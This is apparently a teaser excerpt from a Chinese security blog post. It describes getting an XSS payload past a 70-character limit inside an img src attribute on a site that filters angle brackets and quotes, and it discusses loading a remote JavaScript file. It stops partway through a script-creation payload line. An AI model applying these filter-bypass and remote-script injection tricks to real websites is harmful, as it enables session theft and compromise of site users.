摘要： 今天跟AMXSA在弄一个XSS的时候就讨论到，字符长度限制了70个，该XSS是出现在<img src="xsscode"> ， 后来他说对方过滤了 < > " ' 这样 只能有限的调用。开始我建议他 多弄几个 <img 然后 代码分别写在不同的 src= 中 这样间接的把代码连贯起来。后来他尝试了发现不可以对方处理 <img 头像的时候只有一个攻击点，郁闷了！ 想想平时我们XSS导入一个远程的JS就是为了执行更多的代码，更方便。 1.window.k=document.createElement('Script& 阅读全文